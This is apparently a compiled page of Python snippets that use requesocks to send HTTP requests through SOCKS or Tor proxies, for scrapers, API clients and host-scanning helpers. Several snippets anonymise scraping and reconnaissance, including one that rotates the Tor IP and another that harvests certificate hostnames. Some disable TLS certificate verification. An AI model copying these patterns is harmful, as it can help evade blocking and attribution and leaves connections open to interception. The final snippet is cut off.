Exemplo n.º 1
0
def get_page(url, port, timeout, max_retries=1):
    if max_retries == 1:
        session = requesocks.session()
    elif max_retries > 1:
        session = requesocks.session(config={'max_retries': 10})
    else:
        raise
    session.proxies = {'http': 'socks5://127.0.0.1:{}'.format(port),
                       'https': 'socks5://127.0.0.1:{}'.format(port)}
    return session.get(url, timeout=timeout)
Exemplo n.º 2
0
def get_page(url, port, timeout, max_retries=1):
    if max_retries == 1:
        session = requesocks.session()
    elif max_retries > 1:
        session = requesocks.session(config={'max_retries': 10})
    else:
        raise Exception
    session.proxies = {'http': 'socks5://127.0.0.1:{}'.format(port),
                       'https': 'socks5://127.0.0.1:{}'.format(port)}
    return session.get(url, timeout=timeout)
Exemplo n.º 3
0
def runtest():
	if target.tor is None and target.proxy is None and target.socks is None:
		try:
			request = requests.get(target.host)
			checkparam(request)
		except requests.ConnectionError as error_message:
			print "============================"
			print "HTTP connection failed with status message:"
			print error_message
			print "============================"

	elif target.tor is not None and target.proxy is None and target.socks is None:
		try:		
			session = requesocks.session()
			session.proxies = {
				"socks5": "socks5://127.0.0.1:9050"
			}
			request = session.get(target.host, auth=('user','pass'))
			checkparam(request)
		except requesocks.exceptions.ConnectionError as error_message:
			print "============================"
			print "HTTP connection failed with status message:"
			print error_message
			print "============================"

	elif target.proxy is not None and target.tor is None and target.socks is None:
		proxy = {
			"http": "http://"+target.proxy,
			"https": "https://"+target.proxy
		}
		try:
			request = requests.get(target.host, proxies=proxy)
			checkparam(request)
		except requests.ConnectionError as error_message:
			print "============================"
			print "HTTP connection failed with status message:"
			print error_message
			print "============================"		 	

	elif target.socks is not None and target.proxy is None and target.tor is None:
		try:		
			session = requesocks.session()
			session.proxies = {
				"socks4": "socks4://"+target.socks,
				"socks5": "socks5://"+target.socks
			}
			request = session.get(target.host, auth=('user','pass'))
			checkparam(request)
		except requesocks.exceptions.ConnectionError as error_message:
			print "============================"
			print "HTTP connection failed with status message:"
			print error_message
			print "============================"
Exemplo n.º 4
0
def runtest():
    if target.tor is None and target.proxy is None and target.socks is None:
        try:
            request = requests.get(target.host)
            checkparam(request)
        except requests.ConnectionError as error_message:
            print "============================"
            print "HTTP connection failed with status message:"
            print error_message
            print "============================"

    elif target.tor is not None and target.proxy is None and target.socks is None:
        try:
            session = requesocks.session()
            session.proxies = {"socks5": "socks5://127.0.0.1:9050"}
            request = session.get(target.host, auth=('user', 'pass'))
            checkparam(request)
        except requesocks.exceptions.ConnectionError as error_message:
            print "============================"
            print "HTTP connection failed with status message:"
            print error_message
            print "============================"

    elif target.proxy is not None and target.tor is None and target.socks is None:
        proxy = {
            "http": "http://" + target.proxy,
            "https": "https://" + target.proxy
        }
        try:
            request = requests.get(target.host, proxies=proxy)
            checkparam(request)
        except requests.ConnectionError as error_message:
            print "============================"
            print "HTTP connection failed with status message:"
            print error_message
            print "============================"

    elif target.socks is not None and target.proxy is None and target.tor is None:
        try:
            session = requesocks.session()
            session.proxies = {
                "socks4": "socks4://" + target.socks,
                "socks5": "socks5://" + target.socks
            }
            request = session.get(target.host, auth=('user', 'pass'))
            checkparam(request)
        except requesocks.exceptions.ConnectionError as error_message:
            print "============================"
            print "HTTP connection failed with status message:"
            print error_message
            print "============================"
Exemplo n.º 5
0
		def downloadNewImages():
			tor_process = stem.process.launch_tor_with_config(config = {'SocksPort': str(self.socks_port)})
			self.success = []
			for x in self.new_dog_img_dict.keys():
				try:
					dfile = new_dog_img_dict[x]
					fname= x +'.jpg'
					if not self.bucket.get_key(fname):
						session = requesocks.session()
						session.proxies = {'http': 'socks5://127.0.0.1:9050','https': 'socks5://127.0.0.1:9050'}
				
						file_object = self.bucket.new_key(fname)
						r = session.get(dfile)
						if r.status_code == 200:
							with open(fname, 'wb') as f:
								r.raw.decode_content = True
								shutil.copyfileobj(r.raw, f)
							file_object.set_contents_from_filename('./'+fname,policy='public-read')
							self.success.append(x)
							os.remove(fname)
						else:
							self.err_coll.insert_one({'id':record['id'], 'err':r.status_code})
				except:
					e = sys.exc_info()[1]
					self.err_coll.insert_one({'id':record['id'], 'err':str(e)})
Exemplo n.º 6
0
    def get_metadata(self):
        if self.script_alias:
            archive_url = '{0}/{1}/perfsonar/archive/'.format(
                self.api_url, self.script_alias)
        else:
            archive_url = '{0}/perfsonar/archive/'.format(self.api_url)

        session = requesocks.session()
        if os.getenv('SOCKS5'):
            session.proxies = {
                'http': os.getenv('SOCKS5'),
                'https': os.getenv('SOCKS5')
            }
        session.verify = False
        r = session.get(archive_url,
                        params=dict(self.filters.metadata_filters,
                                    **self.filters.time_filters),
                        headers=self.request_headers)

        self.inspect_request(r)

        if r.status_code == 200 and \
            r.headers['content-type'] == 'application/json':
            data = json.loads(r.text)
            for i in data:
                yield Metadata(i, self.api_url, self.filters)
        else:
            self.http_alert(r)
            return
            yield
def main(stochastic=False, resolve_classes=False):
    session = requesocks.session()
    resolver = ClassResolver(session, resolve_classes)
    timeschedules = TimeSchedules(session)
    print('loaded')
    for index, term in enumerate(timeschedules):
        print(term)
        has_entries = False
        # ignore with probability 1 - (1 / index)
        if random.random() * index >= 1 and stochastic:
            continue
        dataset = TimeSchedulesDataset()
        for dept in term:
            print(dept)
            dataset.add(dept.get_entries())
            has_entries = True
        if has_entries:
            base = os.path.dirname(os.path.realpath(__file__))
            dataset.notify_changes(
                '/var/www/canigraduate/data/timeschedules/%s.json' % str(term))
            dataset.write_timeschedules(
                '/var/www/canigraduate/data/timeschedules/%s.json' % str(term))
            dataset.write_timeschedules_compressed(
                '/var/www/canigraduate/data/timeschedules-compressed/%s.json' %
                str(term))
            dataset.write_timeschedules_data_compressed(
                '/var/www/canigraduate/data/timeschedules-compressed/%s.data.json'
                % str(term))
        if resolve_classes:
            for id in dataset.data.keys():
                resolver.add(id, term, dataset.names[id])
    print('resolving classes')
    if resolve_classes:
        resolver.write(resolve_classes)
Exemplo n.º 8
0
    def get_metadata(self):
        if self.script_alias:
            archive_url = '{0}/{1}/perfsonar/archive/'.format(self.api_url, self.script_alias)
        else:
            archive_url = '{0}/perfsonar/archive/'.format(self.api_url)
        
        session = requesocks.session()
        if os.getenv('SOCKS5'):
            session.proxies = {'http': os.getenv('SOCKS5'), 'https': os.getenv('SOCKS5')}
        session.verify=False
        r = session.get(archive_url, 
           params=dict(self.filters.metadata_filters, **self.filters.time_filters),
           headers = self.request_headers)

        self.inspect_request(r)

        if r.status_code == 200 and \
            r.headers['content-type'] == 'application/json':
            data = json.loads(r.text)
            for i in data:
                yield Metadata(i, self.api_url, self.filters)
        else:
            self.http_alert(r)
            return
            yield
Exemplo n.º 9
0
def get_by_rnp(number, TIMEOUT):
    payload = {
        #"action": "enviar",
        "txtRuc": "",
        "txtRnp": str(number),
        "cmbCapitulo": "",
        "cmbTipoPersona": "",
    }

    kargs = {
        "data": payload,
        "headers": _headers,
        "timeout": TIMEOUT,
    }

    url = "http://www.osce.gob.pe/consultasenlinea/rnp_consulta/ProveedoresInscritos.asp?action=enviar"
    tor_req = req_socks.session()
    tor_req.proxies = _tor_proxies
    try:
        r = tor_req.post(url, **kargs)
        name = extract_name(r.text)
        if name is not None:
            with codecs.open("out_osce.tsv", "a") as myfile:
                myfile.write(number.encode("utf-8") + "\t")
                myfile.write(name.encode("utf-8") + "\n")
    except req_socks.exceptions.Timeout:
        with codecs.open("out_osce.tsv", "a") as myfile:
            out = "Timeout error %s" % number.encode("utf-8")
            myfile.write(out + "\n")
    except socket.timeout:
        with codecs.open("out_osce.tsv", "a") as myfile:
            out = "Timeout error %s" % number.encode("utf-8")
            myfile.write(out + "\n")
Exemplo n.º 10
0
def getip_requesocks(url):
    print "(+) Sending request with requesocks..."
    session = requesocks.session()
    session.proxies = {'http': 'socks5://127.0.0.1:9050',
    'https': 'socks5://127.0.0.1:9050'}
    r = session.get(url)
    print "(+) IP is: " + r.text.replace("\n", "")
Exemplo n.º 11
0
    def __init__(self, cookies_dict: dict=None):
        self.xnova_url = 'uni4.xnova.su'
        self.user_agent = 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0'
        self.error_str = None
        self.proxy = None
        # load user-agent from config/net.ini
        cfg = configparser.ConfigParser()
        cfg.read('config/net.ini', encoding='utf-8')
        if 'net' in cfg:
            self.user_agent = cfg['net']['user_agent']
            self.xnova_url = cfg['net']['xnova_url']
            self.proxy = cfg['net']['proxy']
            if self.proxy == '':
                self.proxy = None
        # construct requests HTTP session
        if self.proxy is not None:
            if self.proxy.startswith('socks5://'):
                # for SOCKS5 proxy create requesocks session
                self.sess = requesocks.session()
                logger.info('Using SOCKS5 proxy session (requesocks)')
        else:
            self.sess = requests.Session()  # else normal session
        if self.proxy is not None:
            self.sess.proxies = {'http': self.proxy, 'https': self.proxy}
            logger.info('Set HTTP/HTTPS proxy to: {0}'.format(self.proxy))

        # Some default headers for a page downloader
        self.sess.headers.update({'User-Agent': self.user_agent})
        self.sess.headers.update({'Referer': 'https://{0}/'.format(self.xnova_url)})
        self.sess.headers.update({'Accept': '*/*'})
        self.sess.headers.update({'Accept-Language': 'ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4'})
        self.sess.headers.update({'Accept-Encoding': 'gzip, deflate'})
        
        if cookies_dict:
            self.set_cookies_from_dict(cookies_dict)
Exemplo n.º 12
0
def downloadNewImages(bucket, new_dog_img_dict, d_id):
	try:
		dfile = new_dog_img_dict[d_id]
		fname= d_id +'.jpg'
		if not bucket.get_key(fname):
			session = requesocks.session()
			session.proxies = {'http': 'socks5://127.0.0.1:9050','https': 'socks5://127.0.0.1:9050'}
	
			file_object = bucket.new_key(fname)
			r = session.get(dfile)
			if r.status_code == 200:
				with open(fname, 'wb') as f:
					r.raw.decode_content = True
					shutil.copyfileobj(r.raw, f)
				file_object.set_contents_from_filename('./'+fname,policy='public-read')
				os.remove(fname)
			else:
				client = MongoClient()
				db = client.pet
				err_coll = db.errs
				err_coll.insert_one({'id':d_id, 'err':r.status_code})
	except:
		client = MongoClient()
		db = client.pet
		err_coll = db.errs
		e = sys.exc_info()[1]
		err_coll.insert_one({'id':record['id'], 'err':str(e)})
def main(stochastic=False, resolve_classes=False):
	session = requesocks.session()
	session.proxies = {'http':'54.183.147.66:3128',
									   'https':'54.183.147.66:3128'}
	resolver = ClassResolver(session, resolve_classes)
	timeschedules = TimeSchedules(session)
	print('loaded')
	for index, term in enumerate(timeschedules):
		print(term)
		has_entries = False
		# ignore with probability 1 - (1 / index)
		if random.random() * index >= 1 and stochastic:
			continue
		dataset = TimeSchedulesDataset()
		for dept in term:
			print(dept)
			dataset.add(dept.get_entries())
			has_entries = True
		if has_entries:
			base = os.path.dirname(os.path.realpath(__file__))
			dataset.notify_changes('/var/www/canigraduate/data/timeschedules/%s.json' % str(term))
			dataset.write_timeschedules('/var/www/canigraduate/data/timeschedules/%s.json' % str(term))
			dataset.write_timeschedules_compressed('/var/www/canigraduate/data/timeschedules-compressed/%s.json' % str(term))
			dataset.write_timeschedules_data_compressed('/var/www/canigraduate/data/timeschedules-compressed/%s.data.json' % str(term))
		if resolve_classes:
			for id in dataset.data.keys():
				resolver.add(id, term, dataset.names[id])
	print('resolving classes')
	if resolve_classes:
		resolver.write(resolve_classes)
Exemplo n.º 14
0
    def login(self):
        self.s = requests.session()

        #self.s.proxies = {'http': 'http://127.0.0.1:8087','https': 'http://127.0.0.1:8087'}
                           
        soup = BeautifulSoup(self.get_source(self.login_url))
        authenticity_token =  soup.find_all(attrs={"name": "authenticity_token"})[0]['value']
        utf8 =  soup.find_all(attrs={"name": "utf8"})[0]['value']
        data = {
            'utf8':utf8,
            'session[login]':self.username,
            'session[password]':self.password,
            'authenticity_token' : authenticity_token
        }

        self.s.post(soup.select('.sign-in__form')[0]['action'], data = data)

        soup = BeautifulSoup(self.get_source('https://tutsplus.com/account/courses'))
        account_name = soup.select('.account-header__name')[0].string

        if not account_name :
            return False

        print 'Logined success, account name: '+account_name
        return True
Exemplo n.º 15
0
def call_uber_api(port, token, lat, lon, fpath):
    print 'Calling api for ' + fpath, port
    """Build a socks session."""
    proxy_addr = 'socks5://127.0.0.1:%s' %port
    session = requests.session()
    session.proxies = {'http': proxy_addr, 'https': proxy_addr}

    url = 'https://api.uber.com/v1/estimates/price'

    parameters = {
    'server_token': token,
    'start_latitude': lat,
    'start_longitude': lon,
    'end_latitude': lat,
    'end_longitude': lon
    }

    with open(fpath, 'a') as f:
        while True:
            try:
                response = session.get(url = url, params = parameters)
                res_json = json.loads(response.content)
            except Exception, e:
                sys.stderr.write(fpath + ': ' + str(e) + '\n')
                break

            f.write(str(int(time.time() * 1000)) + ':::::')
            json.dump(res_json, f)
            f.write('\n')

            break
Exemplo n.º 16
0
 def __init__(self):
     self.cookies = {}
     self.browser = requesocks.session()
     self.browser.cookies.clear()
     self.browser.cookies = self.cookies
     self.sock5 = None
     self.proxy = None
Exemplo n.º 17
0
    def __init__(self, args):
        super(HttpScan, self).__init__(args)
        self.session = requesocks.session()

        adapters.DEFAULT_RETRIES = self.args.max_retries
        self.tor = None
        if self.args.tor:
            self.out.log("Enabling TOR")
            self.tor = Torify()
            self.session.proxies = {'http': 'socks5://127.0.0.1:9050',
                                    'https': 'socks5://127.0.0.1:9050'}
            if self.args.check_tor:
                # Check TOR
                self.out.log("Checking IP via TOR")
                rip, tip = self.tor.check_ip(verbose=True)
                if tip is None:
                    self.out.log('TOR is not working properly!', logging.ERROR)
                    exit(-1)

        if self.args.cookies is not None:
            if path.exists(self.args.cookies) and path.isfile(self.args.cookies):
                self.cookies = MozillaCookieJar(self.args.cookies)
                self.cookies.load()
            else:
                # self.out.log('Could not find cookie file: %s' % self.args.load_cookies, logging.ERROR)
                self.cookies = Cookies.from_request(self.args.cookies)
        else:
            self.cookies = None

        self.ua = UserAgent() if self.args.user_agent is None else self.args.user_agent
Exemplo n.º 18
0
 def construct_session(self):
     #
     # save cookies before replacing session
     saved_cookies = None
     if self.sess is not None:
         if self.sess.cookies is not None:
             saved_cookies = self.sess.cookies
     #
     if self.proxy is not None:
         if self.proxy.startswith('socks5://'):
             # for SOCKS5 proxy create requesocks session
             self.sess = requesocks.session()
             logger.info('Using SOCKS5 proxy session (requesocks)')
     else:
         self.sess = requests.Session()  # else normal session
         logger.info('Using normal session (requests)')
     if self.proxy is not None:
         self.sess.proxies = {'http': self.proxy, 'https': self.proxy}
         logger.info('Set HTTP/HTTPS proxy to: {0}'.format(self.proxy))
     self.sess.headers.update(
         {'referer': 'http://{0}/'.format(self.xnova_url)})
     #
     # restore saved cookies?
     if saved_cookies is not None:
         self.sess.cookies = saved_cookies
Exemplo n.º 19
0
def getip_requesocks(url):
    print "(+) Sending request with requesocks..."
    session = requesocks.session()
    session.proxies = {'http': 'socks5://127.0.0.1:9050',
    'https': 'socks5://127.0.0.1:9050'}
    r = session.get(url)
    print "(+) IP is: " + r.text.replace("\n", "")
Exemplo n.º 20
0
def test_proxy_by_requesocks():
    import requesocks as requests

    session = requests.session()
    session.proxies = proxies
    m = session.get('https://pixiv.net', headers=PIXIV_PAGE_HEADERS)
    print (m.content)
Exemplo n.º 21
0
def getUrl(animelist):
    s = requesocks.session()
    s.proxies = {'http':'socks5://127.0.0.1:1080'}
    urllist = []
    for item in animelist:
        res = s.get('http://www.dilidili.com/anime/'+item).content
        soup = BeautifulSoup(res, "lxml")
        try:
            u = soup.find('div', 'download area').a['href']
        except:
            continue
        if re.search('pan.baidu', u):
            urllist.append(u)
            print "Get Url:"+u
            continue
        res = s.get(u).content
        soup = BeautifulSoup(res, "lxml")
        for it in soup('a', href=True):
            if re.search('pan.baidu', it['href']):
                urllist.append(it['href'])
                print "Get url:"+it['href']
                break
    for item in urllist:
        os.system('echo %s >> urllist.txt' % item)
    return urllist
Exemplo n.º 22
0
def run():
    global ipQueueList
    while not ipQueueList.empty():

        ip = ipQueueList.get()
        burp0_url = "https://www.virustotal.com:443/ui/ip_addresses/%s/resolutions?cursor=&limit=10" % ip
        burp0_headers = {
            "Accept": "*/*",
            "Accept-Language": "en",
            "User-Agent":
            "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
            "Connection": "close"
        }
        proxies = {
            "http": "socks5://127.0.0.1:9000",
            "https": "socks5://127.0.0.1:9000"
        }
        session = requests.session()
        session.proxies = proxies
        session.headers = burp0_headers
        resp = session.get(burp0_url, timeout=20).content
        try:
            msg = json.loads(resp)['data'][0]['attributes']['host_name']
        except:
            try:
                print json.loads(resp)['data']
            except Exception as e:
                msg = "NotFoundError"
        finally:
            print "[+]%s ====>>> %s" % (ip, msg)
Exemplo n.º 23
0
def get_http_client():
    if config['use_tor_proxy']:
        session = requesocks.session()
        session.proxies = {'http': 'socks5://127.0.0.1:%d' % config['tor_proxy_port'],
                           'https': 'socks5://127.0.0.1:%d' % config['tor_proxy_port']}
        return session
    else:
        return requests.session()
Exemplo n.º 24
0
def get_http_client():
    if config['use_tor_proxy']:
        session = requesocks.session()
        session.proxies = {'http': 'socks5://127.0.0.1:%d' % config['tor_proxy_port'],
                           'https': 'socks5://127.0.0.1:%d' % config['tor_proxy_port']}
        return session
    else:
        return requests.session()
Exemplo n.º 25
0
 def makeSession(self):
     self.session = requesocks.session()
     #Use Tor for both HTTP and HTTPS
     if self.tor:
         self.session.proxies = {
             'http': 'socks5://localhost:9150',
             'https': 'socks5://localhost:9150'
         }
Exemplo n.º 26
0
def doGet(*args, **kwargs):
    url        = args[0]
    doVhosts   = kwargs.pop('vhosts'    ,None)
    urlQueue   = kwargs.pop('urlQueue'  ,None)
    subs       = kwargs.pop('subs'      ,None)
    extraHosts = kwargs.pop('extraHosts',None)
    proxy = kwargs.pop('proxy',None)

    kwargs['allow_redirects'] = False
    session = requests.session()
    if(proxy is not None):
        session.proxies={'http':'socks5://'+proxy,'https':'socks5://'+proxy}
    resp = session.get(url[0],**kwargs)

    #If we have an https URL and we are configured to scrape hosts from the cert...
    if(url[0].find('https') != -1 and url[1] == True):
        #Pull hostnames from cert, add as additional URLs and flag as not to pull certs
        host = urlparse(url[0]).hostname
        port = urlparse(url[0]).port
        if(port is None):
            port = 443
        names = []
        try:
            cert     = ssl.get_server_certificate((host,port),ssl_version=ssl.PROTOCOL_SSLv23)
            x509     = M2Crypto.X509.load_cert_string(cert.decode('string_escape'))
            subjText = x509.get_subject().as_text()
            names    = re.findall("CN=([^\s]+)",subjText)
            altNames = x509.get_ext('subjectAltName').get_value()
            names.extend(re.findall("DNS:([^,]*)",altNames))
        except:
            pass

        for name in names:
            if(name.find('*.') != -1):
                for sub in subs:
                    try:
                        sub = sub.strip()
                        hostname = name.replace('*.',sub+'.')
                        if(hostname not in extraHosts):
                            extraHosts[hostname] = 1
                            address = socket.gethostbyname(hostname)
                            urlQueue.put(['https://'+hostname+':'+str(port),False,url[2]])
                            print '[+] Discovered subdomain '+address
                    except:
                        pass
                name = name.replace('*.','')
                if(name not in extraHosts):
                    extraHosts[name] = 1
                    urlQueue.put(['https://'+name+':'+str(port),False,url[2]])
                    print '[+] Added host '+name
            else:
                if (name not in extraHosts):
                    extraHosts[name] = 1
                    urlQueue.put(['https://'+name+':'+str(port),False,url[2]])
                    print '[+] Added host '+name
        return resp
    else:
        return resp
Exemplo n.º 27
0
def doGet(*args, **kwargs):
    url = args[0]
    doVhosts = kwargs.pop("vhosts", None)
    urlQueue = kwargs.pop("urlQueue", None)
    subs = kwargs.pop("subs", None)
    extraHosts = kwargs.pop("extraHosts", None)
    proxy = kwargs.pop("proxy", None)

    kwargs["allow_redirects"] = False
    session = requests.session()
    if proxy is not None:
        session.proxies = {"http": "socks5://" + proxy, "https": "socks5://" + proxy}
    resp = session.get(url[0], **kwargs)

    # If we have an https URL and we are configured to scrape hosts from the cert...
    if url[0].find("https") != -1 and url[1] == True:
        # Pull hostnames from cert, add as additional URLs and flag as not to pull certs
        host = urlparse(url[0]).hostname
        port = urlparse(url[0]).port
        if port is None:
            port = 443
        names = []
        try:
            cert = ssl.get_server_certificate((host, port), ssl_version=ssl.PROTOCOL_SSLv23)
            x509 = M2Crypto.X509.load_cert_string(cert.decode("string_escape"))
            subjText = x509.get_subject().as_text()
            names = re.findall("CN=([^\s]+)", subjText)
            altNames = x509.get_ext("subjectAltName").get_value()
            names.extend(re.findall("DNS:([^,]*)", altNames))
        except:
            pass

        for name in names:
            if name.find("*.") != -1:
                for sub in subs:
                    try:
                        sub = sub.strip()
                        hostname = name.replace("*.", sub + ".")
                        if hostname not in extraHosts:
                            extraHosts[hostname] = 1
                            address = socket.gethostbyname(hostname)
                            urlQueue.put(["https://" + hostname + ":" + str(port), False, url[2]])
                            print "[+] Discovered subdomain " + address
                    except:
                        pass
                name = name.replace("*.", "")
                if name not in extraHosts:
                    extraHosts[name] = 1
                    urlQueue.put(["https://" + name + ":" + str(port), False, url[2]])
                    print "[+] Added host " + name
            else:
                if name not in extraHosts:
                    extraHosts[name] = 1
                    urlQueue.put(["https://" + name + ":" + str(port), False, url[2]])
                    print "[+] Added host " + name
        return resp
    else:
        return resp
Exemplo n.º 28
0
def doGet(*args, **kwargs):
	url        = args[0]
	doVhosts   = kwargs.pop('vhosts'    ,None)
	urlQueue   = kwargs.pop('urlQueue'  ,None)
	subs       = kwargs.pop('subs'      ,None)
	extraHosts = kwargs.pop('extraHosts',None)
	proxy = kwargs.pop('proxy',None)

	kwargs['allow_redirects'] = False
	session = requests.session()
	if(proxy is not None):
		session.proxies={'http':'socks5://'+proxy,'https':'socks5://'+proxy}
	resp = session.get(url[0],**kwargs)

	#If we have an https URL and we are configured to scrape hosts from the cert...
	if(url[0].find('https') != -1 and url[1] == True):
		#Pull hostnames from cert, add as additional URLs and flag as not to pull certs
		host = urlparse(url[0]).hostname
		port = urlparse(url[0]).port
		if(port is None):
			port = 443
		names = []
		try:
			cert     = ssl.get_server_certificate((host,port),ssl_version=ssl.PROTOCOL_SSLv23)
			x509     = M2Crypto.X509.load_cert_string(cert.decode('string_escape'))
			subjText = x509.get_subject().as_text()
			names    = re.findall("CN=([^\s]+)",subjText)
			altNames = x509.get_ext('subjectAltName').get_value()
			names.extend(re.findall("DNS:([^,]*)",altNames))
		except:
			pass

		for name in names:
			if(name.find('*.') != -1):
				for sub in subs:
					try:
						sub = sub.strip()
						hostname = name.replace('*.',sub+'.')
						if(hostname not in extraHosts):
							extraHosts[hostname] = 1
							address = socket.gethostbyname(hostname)
							urlQueue.put(['https://'+hostname+':'+str(port),False,url[2]])
							print '[+] Discovered subdomain '+address
					except:
						pass
				name = name.replace('*.','')
				if(name not in extraHosts):
					extraHosts[name] = 1
					urlQueue.put(['https://'+name+':'+str(port),False,url[2]])
					print '[+] Added host '+name
			else:
				if (name not in extraHosts):
					extraHosts[name] = 1
					urlQueue.put(['https://'+name+':'+str(port),False,url[2]])
					print '[+] Added host '+name
		return resp
	else:	
		return resp
Exemplo n.º 29
0
def init_tor_session():
	global session
	if not session:
		session = requesocks.session()
		session.proxies = {
    			'http': 'socks5://127.0.0.1:9050',
    			'https': 'socks5://127.0.0.1:9050'
		}
		session.headers['User-Agent'] = 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36'
Exemplo n.º 30
0
def get_ip_requesocks(url):
    print('(+) Sending request with requesocks...')
    session = requesocks.session()
    session.proxies = {
        'http': 'socks5://127.0.0.1:9050',
        'https': 'socks5://127.0.0.1:9050'
    }
    r = session.get(url)
    print('(+) IP is: {}'.format(r.text.replace('\n', '')))
Exemplo n.º 31
0
class GCMPush:
    session = requesocks.session() 
    session.proxies = {
        'http': config.SOCKS5_PROXY,
        'https': config.SOCKS5_PROXY,
    }
    mysql = None
    gcm_apps = {}
        
    @classmethod
    def get_gcm_app(cls, appid):
        now = int(time.time())
        app = cls.gcm_apps[appid] if cls.gcm_apps.has_key(appid) else None
        #app不在缓存中或者缓存超时,从数据库获取最新的accessid和secretkey
        if app is None or now - app["timestamp"] > 60:
            sender_id, api_key = application.get_gcm_key(cls.mysql, appid)
            if sender_id is None or api_key is None:
                return None
            app = {}
            app["timestamp"] = now
            app["sender_id"] = sender_id
            app["api_key"] = api_key
            app["appid"] = appid
            cls.gcm_apps[appid] = app

        return app
    
    @classmethod
    def send(cls, api_key, device_token, title, content):
        obj = {
            "to" : device_token,
            "notification" : {
                "body" : content,
                "title" : title
            }
        }

        headers = {'Content-Type': 'application/json; charset=UTF-8',
                   'Authorization': 'key=' + api_key}



        res = cls.session.post(GCM_URL, data=json.dumps(obj), headers=headers)
        if res.status_code != 200:
            logging.error("send gcm message error")
        else:
            logging.debug("send gcm message success")
        
    @classmethod
    def push(cls, appid, title, token, content):
        app = cls.get_gcm_app(appid)
        if app is None:
            logging.warning("can't read gcm api key")
            return False

        cls.send(app["api_key"], token, title, content)
Exemplo n.º 32
0
def init_tor_session():
    global session
    if not session:
        session = requesocks.session()
        session.proxies = {
            'http': 'socks5://127.0.0.1:9050',
            'https': 'socks5://127.0.0.1:9050'
        }
        session.headers[
            'User-Agent'] = 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36'
Exemplo n.º 33
0
def reset_socks():
    if USE_SOCKS_PROXY:
        import os
        os.system("sudo killall -HUP tor") # force tor to get a new IP
        if DEBUG: 
            import requesocks as requests
            session = requests.session()
            session.proxies = {'http': 'socks5://127.0.0.1:9050', 'https': 'socks5://127.0.0.1:9050'}
            resp = session.get('http://ipv4bot.whatismyipaddress.com')
            print(resp.text)
Exemplo n.º 34
0
 def __init__(self):
     self.cookies = {}
     self.browser = requesocks.session()
     self.browser.cookies.clear()
     self.browser.cookies = self.cookies
     self.header = 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36'
     self.sock5 = False
     self.proxy = False
     self.link_host = ''
     self.link_origin = ''
Exemplo n.º 35
0
 def getip(self, url):
     print "(+) Sending request with requesocks..."
     session = requesocks.session()
     session.proxies = {
         'http': 'socks5://%s:%s' % (self.torip, self.torport),
         'https': 'socks5://%s:%s' % (self.torip, self.torport)
     }
     r = session.get(url)
     print "(+) IP is: " + r.text.replace("\n", "")
     return r.text.replace("\n", "")
def getip(url):
    print "(+) Sending request with requesocks..."
    session = requesocks.session()
    session.proxies = {
        'http': 'socks5://14.63.227.176:9050',
        'https': 'socks5://14.63.227.176:9050'
    }
    r = session.get(url)
    print "(+) IP is: " + r.text.replace("\n", "")
    return r.text.replace("\n", "")
Exemplo n.º 37
0
def fetch_one_listing(base_url, page=""):
    base = base_url + page
    reset_socks()
    session = requests.session()
    session.proxies = {'http': 'socks5://127.0.0.1:9050', 'https': 'socks5://127.0.0.1:9050'}
    resp = session.get(base, timeout=3)
    try:
        resp.raise_for_status()  # <- no-op if status==200
    except:
        pass
    return resp.content, resp.encoding
def scrape_category_page(url):
    session = requesocks.session()
    resp = requests_get_trycatch(url, session)
    if not resp:  # URL not valid
        return []
    soup = BeautifulSoup(resp.content)
    items = soup.find_all("a", {"class": "i"}, href=True)
    # if href contains craigslist them it is a redirect to a posting at another location
    item_hrefs = [item["href"] for item in items if "craigslist.org" not in item["href"]]

    return item_hrefs
    def whoami(self):
        """
        This is a check to make sure the proxy is working.
        """

        IPCHICKEN = "http://www.ipchicken.com"
        session = requesocks.session()
        session.proxies = self.session_proxies
        response = session.get(IPCHICKEN, headers=self.request_params)
        soup = BS(response.content, 'html.parser')
        return soup.find_all('p')[1].find('b').next.replace(' ', '').replace('\n', '')
def getip_requesocks(url):
    print "(+) Sending request with requesocks..."
    session = requesocks.session()
    session.proxies = {
        'http': 'socks5://14.63.227.176:9050',
        'https': 'socks5://14.63.227.176:9050'
    }
    r = session.get(url)
    ip = r.text.replace("\n", "")
    requests.get("http://192.168.0.48/add_ip/%s" % ip)
    print "(+) IP is: " + ip
Exemplo n.º 41
0
    def process(self,input,output,year,PROXY=None):
        session = requests.session()
        if PROXY is not None:
            session.proxies = {'http': 'socks5://'+PROXY}
        out = None

        for hcode, title in codes:

            fmt = {'year':year,'hcode':hcode }

            item_codes = session.get(CodesURL % fmt).text
            item_codes = CodesRE.findall(item_codes)
            print item_codes

            if out is None:
                out = csv.writer(file(output,"w"))
                done = False
                first = 0
                while not done:
                    url = "http://www.obudget.org/api/supports/00/{0}?limit=1000&first={1}".format(year,first)
                    rows = real_requests.get(url).json()
                    rows = [ [ unicode(y).encode('utf8') for y  in [x['year'], '', x['subject'], x['code'][2:],
                                                                x['recipient'], x['kind'],
                                                                x['title'], 0, 0, 0]] for x in rows ]
                    out.writerows(rows)
                    done = len(rows)==0
                    first += 1000

            for item_code in item_codes:
                fmt['code'] = item_code

                print year,hcode,title.encode('utf8'),item_code

                for i in range(10):
                    try:
                       frame = session.get(DataURL % fmt).text
                       break
                    except:
                       time.sleep(60)
                       pass
                frame = pq(frame)
                for row in frame("TR"):
                    row = pq(row)
                    _row = [year,hcode,title.encode('utf8'),item_code]
                    for x in row("TD.x3_0, TD.x3_1, TD.x2_0, TD.x2_1"):
                        x=pq(x)
                        x=x.text()
                        try:
                            _row.append(int(x.replace(",","")))
                        except:
                            _row.append(x.encode('utf8'))
                    if len(_row) > 4:
                        out.writerow(_row)
                        print _row
	def __init__(self, port, location, key):
		self.ssh = Popen(['ssh', '-o UserKnownHostsFile=/dev/null', '-o StrictHostKeyChecking=no', '-t', '-t', '-D', str(port), '-i', key, location, '> /dev/null 2>&1'])
		self.session = requesocks.session()
		self.session.proxies = {'http': 'socks5://127.0.0.1:%d' % port, 'https': 'socks5://127.0.0.1:%d' % port}
		# hang until connection established
		while True:
			try:
